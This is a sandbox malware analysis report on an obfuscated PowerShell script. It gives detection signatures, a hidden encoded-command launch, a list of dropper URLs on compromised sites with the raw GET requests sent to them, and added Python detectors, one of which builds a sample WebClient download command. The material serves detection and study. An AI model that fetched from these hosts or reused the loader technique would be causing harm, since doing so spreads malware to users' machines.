
Analysis Report ps_script.ps1

Overview

General Information

Sample Name: ps_script.ps1
Analysis ID: 416466
MD5: afce2bf94f95c17bc64535f2a70a96d0
SHA1: eb88e2f97a2292d63d678963813a1999f69faa45
SHA256: 9edaa045dc625024afee6ac6fd532fdb27d6beb607588c326babdba0b439d602

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Encrypted powershell cmdline option found
Potential dropper URLs found in powershell memory
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Very long command line found
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Non Interactive PowerShell
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Startup

  • System is w10x64
  • powershell.exe (PID: 5496 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\ps_script.ps1' MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5344 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD 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 MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: ps_script.ps1
Rule: PowerShell_Case_Anomaly (Detects obfuscated PowerShell hacktools; author: Florian Roth)
Strings:
  • 0x0: $s1: POwersheLL

Memory Dumps

Source: 00000000.00000002.333177973.00000199B1C5D000.00000004.00000001.sdmp
Rule: PowerShell_Case_Anomaly (Detects obfuscated PowerShell hacktools; author: Florian Roth)
Strings:
  • 0x524: $s1: POwersheLL
  • 0x7704: $s1: POwersheLL
  • 0x7944: $s1: POwersheLL
  • 0x79b4: $s1: POwersheLL
  • 0x7b84: $s1: POwersheLL
  • 0x7c2c: $s1: POwersheLL

Source: 00000000.00000002.333520412.00000199C97A3000.00000004.00000001.sdmp
Rule: PowerShell_Case_Anomaly (Detects obfuscated PowerShell hacktools; author: Florian Roth)
Strings:
  • 0x2036: $s1: powershell
  • 0x2a30: $s1: POwersheLL
  • 0x2036: $sr1: powershell
  • 0x2036: $sn1: powershell

Source: 00000000.00000003.328991391.00000199C97A3000.00000004.00000001.sdmp
Rule: PowerShell_Case_Anomaly (Detects obfuscated PowerShell hacktools; author: Florian Roth)
Strings:
  • 0x2036: $s1: powershell
  • 0x2a30: $s1: POwersheLL
  • 0x2036: $sr1: powershell
  • 0x2036: $sn1: powershell
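The YARA rule above keys on a casing of the word "powershell" that neither humans nor tooling normally produce ("POwersheLL" at offset 0 of the script). The Python check below is an added example that approximates that idea; it is not Florian Roth's rule. It finds every case-insensitive occurrence of the word, in ASCII and in UTF-16LE (command lines recovered from process memory are often wide strings), and flags any whose casing is not in a small allow-list. The allow-list and the three sample inputs are constructed for the example.

```python
import re
from typing import List, Tuple

# Casings that humans and legitimate tooling actually produce. This set is an
# assumption made for the example; it is not copied from the YARA rule.
NORMAL_CASINGS = {"powershell", "Powershell", "PowerShell", "POWERSHELL"}

# ASCII and UTF-16LE ("wide") forms of the word, both matched case-insensitively.
ASCII_RE = re.compile(rb"powershell", re.IGNORECASE)
WIDE_RE = re.compile(
    b"".join(re.escape(c.encode()) + b"\x00" for c in "powershell"), re.IGNORECASE
)


def find_case_anomalies(data: bytes) -> List[Tuple[int, str]]:
    """Return (byte offset, text) for each 'powershell' whose casing is unconventional.

    Offsets are ascending, like the string hits in the YARA overview above.
    """
    hits: List[Tuple[int, str]] = []
    for m in ASCII_RE.finditer(data):
        text = m.group().decode("ascii")
        if text not in NORMAL_CASINGS:
            hits.append((m.start(), text))
    for m in WIDE_RE.finditer(data):
        text = m.group().decode("utf-16-le")
        if text not in NORMAL_CASINGS:
            hits.append((m.start(), text))
    return sorted(hits)


def is_case_anomaly(data: bytes) -> bool:
    """YARA-style verdict: True when at least one unconventional casing is present."""
    return bool(find_case_anomalies(data))


# Constructed inputs. The first mimics the start of an obfuscated launcher like
# the one in this report (the base64 is just "$a=1" in UTF-16LE, not the sample's
# payload); the second is an ordinary command line; the third is a wide string.
OBFUSCATED = b"POwersheLL -w hidden -ENCOD JABhAD0AMQA="
BENIGN = b"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -File C:\\scripts\\backup.ps1"
WIDE_OBFUSCATED = "& pOwErShElL.exe -nop".encode("utf-16-le")

if __name__ == "__main__":
    for sample in (OBFUSCATED, BENIGN, WIDE_OBFUSCATED):
        print(is_case_anomaly(sample), find_case_anomalies(sample))
```

The allow-list approach is deliberately narrow: a legitimate script that writes "powerShell" will trip it, which is the same false-positive profile the rule has, and why the sandbox reports it as one signal among many rather than a verdict on its own.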

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started | Author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD 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
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process started | Author: Florian Roth (rule), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD 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
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD 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
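All three Sigma hits come from one command line: a hidden window (-w hidden), a truncated encoded-command switch (-ENCOD; powershell.exe accepts any unambiguous prefix of a parameter name, which is exactly what makes substring matching necessary) and a parent process that is not explorer.exe (the first powershell.exe spawned the second). The Python below is an added example, not the Sigma rules or Joe Sandbox code. It approximates the three checks over constructed process-creation events and then does what an analyst does next: decodes the base64/UTF-16LE payload and pulls the URLs out of it. The parameter-prefix lists, the two events, the embedded script and the URL in it are all assumptions for the example; the real rules carry longer substring lists and a few extra parent-process exclusions.

```python
import base64
import re
from typing import Dict, List, Optional


def _prefixes(word: str, min_len: int) -> List[str]:
    """All prefixes of word at least min_len long: 'noni', 'nonin', ..., 'noninteractive'."""
    return [word[:i] for i in range(min_len, len(word) + 1)]


# Approximations of the rules' substring lists (assumption, not the rule text).
ENCODED_FLAGS = set(_prefixes("encodedcommand", 1)) | {"ec"}   # -e, -ec, -en, ..., -encodedcommand
NONINTERACTIVE_FLAGS = set(_prefixes("noninteractive", 4))     # -noni ... -noninteractive
WINDOW_FLAGS = set(_prefixes("windowstyle", 1))                 # -w ... -windowstyle
HIDDEN_VALUES = set(_prefixes("hidden", 1))                     # h ... hidden

URL_RE = re.compile(r"https?://[^\s'\";)]+")


def tokens(cmdline: str) -> List[str]:
    """Whitespace-split the command line and strip the quotes the sandbox renders."""
    return [t.strip("'\"") for t in cmdline.split()]


def encoded_payload(cmdline: str) -> Optional[str]:
    """Return the argument following an -EncodedCommand variant, if there is one."""
    toks = tokens(cmdline)
    for i, t in enumerate(toks[:-1]):
        if t.startswith("-") and t[1:].lower() in ENCODED_FLAGS:
            return toks[i + 1]
    return None


def decode_payload(b64: str) -> Optional[str]:
    """-EncodedCommand payloads are base64 over UTF-16LE; None if the text is not one."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def match_rules(event: Dict[str, str]) -> List[str]:
    """Names of the three rules (as approximated here) that the event triggers."""
    hits: List[str] = []
    low = [t.lower() for t in tokens(event["CommandLine"])]
    if encoded_payload(event["CommandLine"]) is not None:
        hits.append("Suspicious Encoded PowerShell Command Line")
    substring = False
    for i, t in enumerate(low):
        if not t.startswith("-"):
            continue
        name = t[1:]
        if name in ENCODED_FLAGS or name in NONINTERACTIVE_FLAGS:
            substring = True
        if name in WINDOW_FLAGS and i + 1 < len(low) and low[i + 1] in HIDDEN_VALUES:
            substring = True
    if substring:
        hits.append("Suspicious PowerShell Parameter Substring")
    # Non-interactive: the parent is anything other than explorer.exe.
    if not event["ParentImage"].lower().endswith("\\explorer.exe"):
        hits.append("Non Interactive PowerShell")
    return hits


def analyze(event: Dict[str, str]) -> Dict[str, object]:
    """Rule hits plus the decoded script and any URLs found in it."""
    payload = encoded_payload(event["CommandLine"])
    decoded = decode_payload(payload) if payload else None
    return {
        "rules": match_rules(event),
        "decoded": decoded,
        "urls": URL_RE.findall(decoded) if decoded else [],
    }


def _encode(script: str) -> str:
    """Build an -EncodedCommand argument the way a loader's builder does."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed events shaped like the "Process started" records above. The
# script and the URL inside it are made up; neither is the sample's real payload.
EVENTS: List[Dict[str, str]] = [
    {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe' -w hidden -ENCOD "
        + _encode("$u='https://example.invalid/wp-content/x/';"
                  "(New-Object Net.WebClient).DownloadFile($u, $env:TEMP + '\\a.dll')"),
    },
    {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    },
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(analyze(ev))
```

Matching on parameter prefixes catches -ENCOD and -w hidden, but a loader can just as easily feed the script through -Command with string concatenation or via stdin, so the command line is only the first layer; PowerShell Script Block Logging (Event ID 4104) records the de-obfuscated script regardless of how it was passed and is the more robust source to alert on.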

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: ps_script.ps1 | Avira: detected
Antivirus detection for URL or domain
Source: http://www.hintup.com.br | Avira URL Cloud: Label: phishing
Source: http://etdog.com/index.php/2020/12/03/faq | Avira URL Cloud: Label: phishing
Source: http://etdog.com/wp-content/uploads/2020/12/ | Avira URL Cloud: Label: phishing
Source: http://etdog.com/wp-content/uploads/2020/12/footer-logo-1.png | Avira URL Cloud: Label: phishing
Source: http://etdog.com | Avira URL Cloud: Label: phishing
Source: https://www.stmarouns.nsw.edu.au/paypal/b8G/ | Avira URL Cloud: Label: phishing
Source: http://etdog.com/wp-content/themes/pandaminer/static/swiper/css/swiper.min.css | Avira URL Cloud: Label: phishing
Source: http://etdog.com/index.php/wp-json/ | Avira URL Cloud: Label: phishing
Source: http://etdog.com/wp-content/uploads/2020/12/2-2.png) | Avira URL Cloud: Label: phishing
Source: http://en.etdog.com/ | Avira URL Cloud: Label: phishing
Source: http://etdog.com/index.php/%e5%85%b3%e4%ba%8e/ | Avira URL Cloud: Label: phishing
Source: https://mikegeerinck.com/c/YYsa/ | Avira URL Cloud: Label: malware
Source: http://www.stmarouns.nsw.edu.au/paypal/b8G/ | Avira URL Cloud: Label: malware
Source: http://etdog.com/wp-content/themes/pandaminer/static/js/analytics.js | Avira URL Cloud: Label: phishing
Source: https://www.hintup.com.br/wp-content/dE/ | Avira URL Cloud: Label: phishing
Source: http://etdog.com/wp-content/themes/pandaminer/static/layer/layer.js | Avira URL Cloud: Label: phishing
Multi AV Scanner detection for domain / URL
Source: wm.mcdevelop.net | VirusTotal: Detection: 6%
Source: etdog.com | VirusTotal: Detection: 9%
Source: freelancerwebdesignerhyderabad.com | VirusTotal: Detection: 5%
Source: www.hintup.com.br | VirusTotal: Detection: 8%
Multi AV Scanner detection for submitted file
Source: ps_script.ps1 | VirusTotal: Detection: 8%
Source: unknown | HTTPS traffic detected: 35.214.199.246:443 -> 192.168.2.3:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.223.27:443 -> 192.168.2.3:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 143.204.98.64:443 -> 192.168.2.3:49740 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 216.127.164.209: -> 192.168.2.3:
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp | String found in memory: <script type="application/ld+json" class="yoast-schema-graph">{"
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp | String found in memory: context":"https://schema.org","
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp | String found in memory: graph":[{"
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp | String found in memory: type":"WebSite","
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp | String found in memory: id":"https://mikegeerinck.com/#website","url":"https://mikegeerinck.com/","name":"Mike Geerinck \ud83d\udd25 Direct-Response Marketing","description":"Scale Your Business Predictable","potentialAction":[{"
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp | String found in memory: type":"SearchAction","target":"https://mikegeerinck.com/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"en-US"}]}</script>
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp | String found in memory: font-face{font-family:eicons;src:url(https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);src:url(https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0#iefix) format("embedded-opentype"),url(https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0) format("woff2"),url(https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0) format("woff"),url(https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0) format("truetype"),url(https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#eicon) format("svg");font-weight:400;font-style:normal}
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmp | String found in memory: https://admintk.com/wp-admin/L/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmp | String found in memory: https://mikegeerinck.com/c/YYsa/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmp | String found in memory: http://freelancerwebdesignerhyderabad.com/cgi-bin/S/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmp | String found in memory: http://etdog.com/wp-content/nu/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmp | String found in memory: https://www.hintup.com.br/wp-content/dE/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmp | String found in memory: http://www.stmarouns.nsw.edu.au/paypal/b8G/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmp | String found in memory: http://wm.mcdevelop.net/content/6F2gd/
Source: global traffic | HTTP traffic detected:
    GET /cgi-bin/S/ HTTP/1.1
    Host: freelancerwebdesignerhyderabad.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /wp-content/nu/ HTTP/1.1
    Host: etdog.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /paypal/b8G/ HTTP/1.1
    Host: www.stmarouns.nsw.edu.au
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /content/6F2gd/ HTTP/1.1
    Host: wm.mcdevelop.net
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 162.241.148.243
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
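Each of the four GET requests above carries only a Host and a Connection header; there is no User-Agent, which is the condition behind the report's "HTTP GET or POST without a user agent" signature. The Python below is an added example, not Joe Sandbox's signature logic. It parses raw HTTP/1.x request heads and reports the ones that lack the header. The four requests are the ones listed in the report, reconstructed with CRLF line endings; the fifth, benign request with a User-Agent is constructed for contrast.

```python
from typing import Dict, List, Optional


def parse_request(raw: str) -> Optional[Dict[str, object]]:
    """Parse a raw HTTP/1.x request head (request line + headers) into a dict.

    Returns None for anything that is not a well-formed request. Header names
    are lower-cased so lookups are case-insensitive, as HTTP requires.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line:
            continue
        name, sep, value = line.partition(":")
        if not sep:
            return None
        headers[name.strip().lower()] = value.strip()
    return {"method": parts[0], "path": parts[1], "version": parts[2], "headers": headers}


def missing_user_agent(raw_requests: List[str]) -> List[str]:
    """Return 'METHOD host/path' for every parseable request without a User-Agent."""
    flagged: List[str] = []
    for raw in raw_requests:
        req = parse_request(raw)
        if req is None:
            continue
        headers = req["headers"]
        if "user-agent" not in headers:
            flagged.append(f"{req['method']} {headers.get('host', '?')}{req['path']}")
    return flagged


# The first four are the report's requests with CRLF restored; the fifth is
# a constructed benign request that does carry a User-Agent.
SAMPLE_REQUESTS = [
    "GET /cgi-bin/S/ HTTP/1.1\r\nHost: freelancerwebdesignerhyderabad.com\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /wp-content/nu/ HTTP/1.1\r\nHost: etdog.com\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /paypal/b8G/ HTTP/1.1\r\nHost: www.stmarouns.nsw.edu.au\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /content/6F2gd/ HTTP/1.1\r\nHost: wm.mcdevelop.net\r\nConnection: Keep-Alive\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: example.invalid\r\nUser-Agent: Mozilla/5.0\r\nConnection: Keep-Alive\r\n\r\n",
]

if __name__ == "__main__":
    for entry in missing_user_agent(SAMPLE_REQUESTS):
        print(entry)
```

.NET's WebClient, the downloader most PowerShell loaders of this kind use, sends no User-Agent unless the script sets one, so the absence of the header is a cheap pivot in proxy logs; it is also produced by plenty of legitimate scripted clients, so pair it with the destination and the parent process rather than alerting on it alone.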
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: <a data-v-6ccbd8c6="" href="https://www.facebook.com/" equals www.facebook.com (Facebook)
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp | String found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-facebook elementor-repeater-item-49231b1" href="https://www.facebook.com/Mikegeerinck1/" target="_blank"> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp | String found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube elementor-repeater-item-129de04" href="https://www.youtube.com/channel/UCezyOaog07qIo-EMB_zABkw?view_as=subscriber" target="_blank"> equals www.youtube.com (Youtube)
Source: A69S.dll.2.dr | String found in binary or memory: src="https://www.facebook.com/tr?id=406116357357499&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
Source: unknown | DNS traffic detected: queries for: admintk.com
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Tue, 18 May 2021 13:54:01 GMT
    Server: nginx/1.19.10
    Content-Type: text/html
    Content-Length: 583
    Last-Modified: Thu, 25 Feb 2021 17:54:10 GMT
    Vary: Accept-Encoding
    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
Source: powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmp | String found in binary or memory: http://admintk.com
Source: powershell.exe, 00000002.00000002.324350205.000001B627EBD000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmp | String found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
Source: powershell.exe, 00000002.00000002.324694985.000001B62807F000.00000004.00000001.sdmp | String found in binary or memory: http://cps.letsencrypt.org0
Source: powershell.exe, 00000000.00000003.328948448.00000199C97B8000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.324317639.000001B627E6F000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmp | String found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmp | String found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
Source: powershell.exe, 00000002.00000002.324350205.000001B627EBD000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: powershell.exe, 00000002.00000002.324350205.000001B627EBD000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: powershell.exe, 00000002.00000002.324350205.000001B627EBD000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmp | String found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmp | String found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
Source: powershell.exe, 00000002.00000002.324555502.000001B627FFA000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: powershell.exe, 00000002.00000003.272680165.000001B6280C5000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.2.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000002.00000002.324694985.000001B62807F000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab7
Source: powershell.exe, 00000002.00000002.324694985.000001B62807F000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?9c5d727f110d3
Source: powershell.exe, 00000002.00000002.324694985.000001B62807F000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabs
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://en.etdog.com/
Source: powershell.exe, 00000002.00000002.323111990.000001B61115B000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/index.php/%e4%bb%a3%e7%90%86%e4%bf%a1%e6%81%af/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/index.php/%e5%85%b3%e4%ba%8e/
Source: powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/index.php/%e6%89%98%e7%ae%a1/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/index.php/%e7%
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/index.php/%e7%0
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/index.php/%e7%9f%bf%e6%9c%ba/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/index.php/2020/12/03/faq
Source: powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/index.php/wp-json/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmp | String found in binary or memory: http://etdog.com/wp-content/nu/
